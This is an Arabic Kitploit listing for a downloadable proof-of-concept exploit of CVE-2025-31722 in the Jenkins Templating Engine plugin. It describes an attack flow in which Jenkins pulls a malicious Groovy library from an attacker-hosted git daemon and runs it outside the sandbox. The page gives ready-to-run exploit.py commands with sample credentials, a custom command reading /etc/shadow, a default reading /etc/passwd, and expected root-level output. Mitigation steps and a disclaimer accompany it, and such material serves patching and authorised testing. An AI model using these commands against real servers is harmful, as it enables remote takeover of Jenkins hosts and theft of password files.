Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-31722 — استغلال إثبات المفهوم لتجاوز صندوق الحماية في إضافة Jenkins Templating Engine (CVE-2025-31722) مما يتيح تنفيذ التعليمات البرمجية عن بُعد عبر حقن مكتبة Groovy ضارة. | Kitploit
أدوات/GitHubGitHub/h3raklez/cve-2025-31722
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubh3raklez/cve-2025-31722

CVE-2025-31722

استغلال إثبات المفهوم لتجاوز صندوق الحماية في إضافة Jenkins Templating Engine (CVE-2025-31722) مما يتيح تنفيذ التعليمات البرمجية عن بُعد عبر حقن مكتبة Groovy ضارة.

عرض المستودع
34منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-31722 — Jenkins Templating Engine RCE

لأغراض التعليم والبحث الأمني المصرح به فقط.

الوصف

ثغرة تجاوز الصندوق الرمل (Sandbox Bypass) في إضافة Jenkins Templating Engine (JTE) الإصدار 2.5.3 فأقل تسمح لمستخدم منخفض الصلاحيات بتنفيذ أكواد عشوائية على خادم Jenkins.

يحدث الخلل لأن JTE يقوم بتحميل المكتبات من مستودع git خارجي محدد في تكوين GovernanceTier على مستوى المجلد وتنفيذ الخطوات من تلك المكتبات خارج صندوق الرمل الخاص بـ Groovy، بغض النظر عن مستوى صلاحية المستخدم الذي أنشأ المهمة.

CVSS: 8.8 (عالية)
النوع: تجاوز الصندوق الرمل → تنفيذ أكواد عن بعد (RCE)
المكون المتأثر: إضافة pipeline-templating-engine ≤ 2.5.3
الإصدار المُصحّح: 2.5.4+


سير الهجوم

root@kitploit:~
Attacker (Kali)                          Jenkins Server
───────────────                          ──────────────
1. ينشئ مستودع git مع evil.groovy
2. يشغل git daemon على المنفذ :9418
3. ينشئ مجلدًا في Jenkins               →    مجلد يحتوي على GovernanceTier
   يشير إلى git://KALI:9418/…                موجه لمستودع المهاجم
4. ينشئ مهمة باستخدام AdHoc template    →    المهمة تستدعي evil()
5. يشغل البناء                          →    JTE يستنسخ المستودع من Kali
                                            ينفذ evil() خارج الصندوق الرمل
                                    ←    RCE كمستخدم Jenkins

المتطلبات

خادم Jenkins (الهدف)

  • Jenkins مثبتة عليه إضافة Templating Engine 2.5.3
  • الإضافات: cloudbees-folder, git, workflow-aggregator
  • CSRF معطل
  • مستخدم attacker بصلاحيات: Item/READ, Item/CREATE, Item/CONFIGURE, Item/BUILD
  • العقدة المدمجة (Built-In node) متصلة وبها على الأقل منفذ تنفيذ واحد (executor)
  • اتصال شبكة صادر من الخادم إلى عنوان IP الخاص بالمهاجم على المنفذ 9418

جهاز المهاجم (Kali)

  • Python 3.8+
  • git مثبت
  • المنفذ 9418 يمكن الوصول إليه من خادم Jenkins
  • مكتبة Python: requests
root@kitploit:~
pip install requests

إعداد المختبر

الإعداد المُثبت على خادم Debian/Ubuntu يتضمن تثبيت Jenkins وتكوين المستخدمين والصلاحيات والإضافات المطلوبة. لا يقوم بإنشاء أي محتوى ضار — حيث يتم التعامل مع ذلك حصريًا بواسطة PoC.


الاستخدام

الاستغلال الأساسي

root@kitploit:~
python3 exploit.py \
  --url http://<JENKINS-IP>:8080 \
  --user attacker \
  --pass attacker123 \
  --git-host <KALI-IP>

أمر مخصص

root@kitploit:~
python3 exploit.py \
  --url http://<JENKINS-IP>:8080 \
  --user attacker \
  --pass attacker123 \
  --git-host <KALI-IP> \
  --cmd "cat /etc/shadow"

التنظيف

root@kitploit:~
python3 exploit.py \
  --url http://<JENKINS-IP>:8080 \
  --user attacker \
  --pass attacker123 \
  --git-host <KALI-IP> \
  --cleanup

المعاملات

المعاملالوصفمطلوب
--urlعنوان Jenkins الأساسينعم
--userمستخدم بصلاحيات Item/CREATE+CONFIGURE+BUILDنعم
--passكلمة مرور المستخدمنعم
--git-hostعنوان Kali الذي يمكن الوصول إليه من Jenkinsنعم
--cmdالأمر المراد تنفيذه على الخادم (الافتراضي: id && hostname && cat /etc/passwd)لا
--cleanupحذف المجلد والمهمة والمستودع التي أنشأها الأداةلا

كيف يعمل PoC

  1. setup_repo() — ينشئ ~/jte-exploit/evil-lib/steps/evil.groovy على Kali بالأمر المراد تنفيذه
  2. start_git_daemon() — يشغل git daemon على Kali على المنفذ 9418
  3. create_folder() — ينشئ مجلدًا في Jenkins مع GovernanceTier يشير إلى git://KALI:9418/jte-exploit
  4. create_job() — ينشئ مهمة بـ AdHocTemplateFlowDefinition تعلن evil-lib وتستدعي evil()
  5. trigger_and_wait() — يشغل البناء وينتظر النتيجة
  6. print_output() — يعرض مخرجات الكونسول مع نتيجة RCE

يبقى git daemon نشطًا طوال دورة البناء بأكملها ويتم إنهاؤه تلقائيًا بمجرد اكتمال البناء.


المخرجات المتوقعة

root@kitploit:~
=================================================================
  CVE-2025-31722 — Jenkins Templating Engine RCE
  Target  : http://10.211.55.10:8080
  Git host: 10.211.55.7
  Command : id && hostname && cat /etc/passwd
=================================================================

[+] Authenticated as: attacker (id=attacker)
[+] Repo created: /root/jte-exploit
[+] Malicious step: evil-lib/steps/evil.groovy
[+] Git daemon running at git://10.211.55.7:9418/jte-exploit
[+] Folder created
[+] Job created
[+] Build queued

=================================================================
  CVE-2025-31722 — RCE OUTPUT
=================================================================
[JTE] ...
uid=0(root) gid=0(root) groups=0(root)
debian
root:x:0:0:root:/root:/bin/bash
...
=================================================================

التخفيف

  • تحديث إضافة Templating Engine إلى الإصدار 2.5.4 أو أحدث
  • تقييد صلاحيات Item/CREATE و Item/CONFIGURE للمستخدمين الموثوقين فقط
  • تفعيل حماية CSRF في Jenkins
  • مراجعة المجلدات التي تحتوي تكوينات GovernanceTier موجهة لمستودعات خارجية

المراجع

  • إعلان أمان Jenkins
  • GitHub إضافة JTE

إخلاء مسؤولية قانونية: يُقصد من هذا PoC الأغراض التعليمية فقط والاختبار في بيئات خاضعة للرقابة. استخدامه ضد أنظمة دون إذن صريح غير قانوني.

تنزيل الأداة